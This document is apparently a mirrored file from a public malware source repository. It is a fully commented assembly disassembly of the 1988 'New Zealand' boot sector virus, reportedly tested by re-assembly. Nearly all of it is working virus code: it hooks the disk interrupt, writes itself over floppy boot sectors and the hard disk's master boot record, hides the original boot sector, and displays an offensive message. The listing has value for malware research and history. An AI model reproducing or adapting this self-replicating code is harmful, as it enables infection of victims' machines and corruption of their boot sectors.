mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-18 17:36:11 +00:00
284 lines
12 KiB
NASM
284 lines
12 KiB
NASM
;
|
|
; IMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM;
|
|
; : British Computer Virus Research Centre :
|
|
; : 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England :
|
|
; : Telephone: Domestic 0273-26105, International +44-273-26105 :
|
|
; : :
|
|
; : The 'New Zealand' Virus :
|
|
; : Disassembled by Joe Hirst, November 1988 :
|
|
; : :
|
|
; : Copyright (c) Joe Hirst 1988, 1989. :
|
|
; : :
|
|
; : This listing is only to be made available to virus researchers :
|
|
; : or software writers on a need-to-know basis. :
|
|
; HMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM<
|
|
|
|
; The virus consists of a boot sector only. The original boot sector
|
|
; is kept at track zero, head one, sector three on a floppy disk, or
|
|
; track zero, head zero, sector two on a hard disk.
|
|
|
|
; The disassembly has been tested by re-assembly using MASM 5.0.
|
|
|
|
; The program requires an origin address of 7C00H, as it is designed
|
|
; to load and run as a boot sector.
|
|
|
|
RAM SEGMENT AT 0
|
|
|
|
; System data
|
|
|
|
ORG 4CH
|
|
BW004C DW ? ; Interrupt 19 (13H) offset
|
|
BW004E DW ? ; Interrupt 19 (13H) segment
|
|
ORG 413H
|
|
BW0413 DW ? ; Total RAM size
|
|
ORG 440H
|
|
BB0440 DB ? ; Motor timeout counter
|
|
ORG 46CH
|
|
BB046C DB ? ; System clock
|
|
|
|
ORG 7C0AH
|
|
I13_OF DW ?
|
|
I13_SG DW ?
|
|
HICOOF DW ?
|
|
HICOSG DW ? ; High core segment
|
|
|
|
RAM ENDS
|
|
|
|
CODE SEGMENT BYTE PUBLIC 'CODE'
|
|
ASSUME CS:CODE,DS:RAM
|
|
|
|
START: DB 0EAH ; Far jump to next byte
|
|
DW BP0010, 07C0H
|
|
|
|
BP0010: JMP BP0110
|
|
|
|
DRIVEN DB 0 ; Drive number (A=0, B=1, C=2)
|
|
DUMMY DB 0
|
|
|
|
; Original Int 13H address
|
|
|
|
INT_13 EQU THIS DWORD
|
|
DW 0
|
|
DW 0
|
|
|
|
; Branch address in high core
|
|
|
|
HIGHCO EQU THIS DWORD
|
|
DW BP0120
|
|
DW 0
|
|
|
|
; Boot sector processing address
|
|
|
|
BOOTST EQU THIS DWORD
|
|
DW 07C00H
|
|
DW 0
|
|
|
|
; Interrupt 13H disk I/O routine
|
|
|
|
BP0020: PUSH DS
|
|
PUSH AX
|
|
CMP AH,2 ; Sub-function 2
|
|
JB BP0030 ; Pass on if below
|
|
CMP AH,4 ; Sub-function 4
|
|
JNB BP0030 ; Pass on if not below
|
|
CMP DL,0 ; Is drive A
|
|
JNE BP0030 ; Pass on if not
|
|
XOR AX,AX ; \ Segment zero
|
|
MOV DS,AX ; /
|
|
MOV AL,BB0440 ; Get motor timeout counter
|
|
OR AL,AL ; Test for zero
|
|
JNE BP0030 ; Branch if not
|
|
CALL BP0040 ; Call infection routine
|
|
BP0030: POP AX
|
|
POP DS
|
|
JMP INT_13 ; Pass control to Int 13H
|
|
|
|
; Infection routine
|
|
|
|
BP0040: PUSH BX
|
|
PUSH CX
|
|
PUSH DX
|
|
PUSH ES
|
|
PUSH SI
|
|
PUSH DI
|
|
MOV SI,4 ; Retry count
|
|
BP0050: MOV AX,201H ; Read one sector
|
|
PUSH CS ; \ Set ES to CS
|
|
POP ES ; /
|
|
MOV BX,200H ; Boot sector buffer
|
|
MOV CX,1 ; Track zero, sector 1
|
|
XOR DX,DX ; Head zero, drive A
|
|
PUSHF ; Fake an interrupt
|
|
CALL INT_13 ; Call Int 13H
|
|
JNB BP0060 ; Branch if no error
|
|
XOR AX,AX ; Reset disk sub-system
|
|
PUSHF ; Fake an interrupt
|
|
CALL INT_13 ; Call Int 13H
|
|
DEC SI ; Decrement retry count
|
|
JNE BP0050 ; Retry
|
|
JMP BP0080 ; No more retries
|
|
|
|
BP0060: XOR SI,SI ; Start of program
|
|
MOV DI,200H ; Boot sector buffer
|
|
MOV AX,ES:[SI] ; Get first word
|
|
CMP AX,ES:[DI] ; Test if same
|
|
JNE BP0070 ; Install if not
|
|
MOV AX,ES:[SI+2] ; Get second word
|
|
CMP AX,ES:[DI+2] ; Test if same
|
|
JNE BP0070 ; Install if not
|
|
JMP BP0080 ; Pass on
|
|
|
|
BP0070: MOV AX,301H ; Write one sector
|
|
MOV BX,200H ; Boot sector buffer
|
|
MOV CX,3 ; Track zero, sector 3
|
|
MOV DX,100H ; Head 1, drive A
|
|
PUSHF ; Fake an interrupt
|
|
CALL INT_13 ; Call Int 13H
|
|
JB BP0080 ; Branch if error
|
|
MOV AX,301H ; Write one sector
|
|
XOR BX,BX ; This sector
|
|
MOV CL,1 ; Track zero, sector 1
|
|
XOR DX,DX ; Head zero, drive A
|
|
PUSHF ; Fake an interrupt
|
|
CALL INT_13 ; Call Int 13H
|
|
BP0080: POP DI
|
|
POP SI
|
|
POP ES
|
|
POP DX
|
|
POP CX
|
|
POP BX
|
|
RET
|
|
|
|
; Display message
|
|
|
|
BP0090: MOV AL,CS:[BX] ; Get next message byte
|
|
INC BX ; Update pointer
|
|
CMP AL,0 ; Test for end of message
|
|
JNE BP0100 ; Branch to display
|
|
RET
|
|
|
|
BP0100: PUSH AX
|
|
PUSH BX
|
|
MOV AH,0EH ; Write TTY mode
|
|
MOV BH,0
|
|
INT 10H ; VDU I/O
|
|
POP BX
|
|
POP AX
|
|
JMP SHORT BP0090 ; Process next byte
|
|
|
|
; Install in high core
|
|
|
|
BP0110: XOR AX,AX ; \ Segment zero
|
|
MOV DS,AX ; /
|
|
CLI
|
|
MOV SS,AX ; \ Set stack to boot sector area
|
|
MOV SP,7C00H ; /
|
|
STI
|
|
MOV AX,BW004C ; Get Int 13H offset
|
|
MOV I13_OF,AX ; Store in jump offset
|
|
MOV AX,BW004E ; Get Int 13H segment
|
|
MOV I13_SG,AX ; Store in jump segment
|
|
MOV AX,BW0413 ; Get total RAM size
|
|
DEC AX ; \ Subtract 2k
|
|
DEC AX ; /
|
|
MOV BW0413,AX ; Replace total RAM size
|
|
MOV CL,6 ; Bits to move
|
|
SHL AX,CL ; Convert to Segment
|
|
MOV ES,AX ; Set ES to segment
|
|
MOV HICOSG,AX ; Move segment to jump address
|
|
MOV AX,OFFSET BP0020 ; Get Int 13H routine address
|
|
MOV BW004C,AX ; Set new Int 13H offset
|
|
MOV BW004E,ES ; Set new Int 13H segment
|
|
MOV CX,OFFSET ENDADR ; Load length of program
|
|
PUSH CS ; \ Set DS to CS
|
|
POP DS ; /
|
|
XOR SI,SI ; \ Set pointers to zero
|
|
MOV DI,SI ; /
|
|
CLD
|
|
REPZ MOVSB ; Copy program to high core
|
|
JMP HIGHCO ; Branch to next instruc in high core
|
|
|
|
; Continue processing in high core
|
|
|
|
BP0120: MOV AX,0 ; Reset disk sub-system
|
|
INT 13H ; Disk I/O
|
|
XOR AX,AX ; \ Segment zero
|
|
MOV ES,AX ; /
|
|
ASSUME DS:NOTHING,ES:RAM
|
|
MOV AX,201H ; Read one sector
|
|
MOV BX,7C00H ; Boot sector buffer address
|
|
CMP DRIVEN,0 ; Test drive is A
|
|
JE BP0130 ; Branch if yes
|
|
MOV CX,2 ; Track zero, sector 2
|
|
MOV DX,80H ; Side zero, drive C
|
|
INT 13H ; Disk I/O
|
|
JMP BP0150 ; Pass control to boot sector
|
|
|
|
; Floppy disk
|
|
|
|
BP0130: MOV CX,3 ; Track zero, sector 3
|
|
MOV DX,100H ; Side one, drive A
|
|
INT 13H ; Disk I/O
|
|
JB BP0150 ; Branch if error
|
|
TEST BB046C,7 ; Test low byte of time
|
|
JNZ BP0140 ; Branch if not 7
|
|
MOV BX,OFFSET MESSAGE ; Load message address
|
|
CALL BP0090 ; Display message
|
|
BP0140: PUSH CS ; \ Set ES to CS
|
|
POP ES ; /
|
|
MOV AX,201H ; Read one sector
|
|
MOV BX,200H ; C-disk boot sector buffer
|
|
MOV CX,1 ; Track zero, sector 1
|
|
MOV DX,80H ; Side zero, drive C
|
|
INT 13H ; Disk I/O
|
|
JB BP0150 ; Branch if error
|
|
PUSH CS ; \ Set DS to CS
|
|
POP DS ; /
|
|
MOV SI,200H ; C-disk boot sector buffer
|
|
MOV DI,0 ; Start of program
|
|
MOV AX,[SI] ; Get first word
|
|
CMP AX,[DI] ; Compare to C-disk
|
|
JNE BP0160 ; Install on C-disk if different
|
|
MOV AX,[SI+2] ; Get second word
|
|
CMP AX,[DI+2] ; Compare to C-disk
|
|
JNE BP0160 ; Install on C-disk if different
|
|
BP0150: MOV DRIVEN,0 ; Drive A
|
|
MOV DUMMY,0
|
|
JMP BOOTST ; Pass control to boot sector
|
|
|
|
; Install on C-disk
|
|
|
|
BP0160: MOV DRIVEN,2 ; Drive C
|
|
MOV DUMMY,0
|
|
MOV AX,301H ; Write one sector
|
|
MOV BX,200H ; C-disk boot sector buffer
|
|
MOV CX,2 ; Track zero, sector 2
|
|
MOV DX,80H ; side zero, drive C
|
|
INT 13H ; Disk I/O
|
|
JB BP0150 ; Branch if error
|
|
PUSH CS ; \ Set DS to CS
|
|
POP DS ; /
|
|
PUSH CS ; \ Set ES to CS
|
|
POP ES ; /
|
|
MOV SI,OFFSET ENDADR+200H ; Target offset
|
|
MOV DI,OFFSET ENDADR ; Source offset
|
|
MOV CX,OFFSET ENDADR-400H ; Length to move
|
|
REPZ MOVSB ; Copy C-disk boot sector
|
|
MOV AX,301H ; Write one sector
|
|
MOV BX,0 ; Write this sector
|
|
MOV CX,1 ; Track zero, sector 1
|
|
MOV DX,80H ; Side zero, drive C
|
|
INT 13H ; Disk I/O
|
|
JMP SHORT BP0150 ; Pass control to boot sector
|
|
|
|
MESSAGE DB 7, 'Old DICKs don't work!', 7, 0DH, 0AH, 0AH, 0
|
|
DB 'Neither does your computer'
|
|
|
|
ENDADR EQU $-1
|
|
|
|
CODE ENDS
|
|
|
|
END START
|
|
|
|
|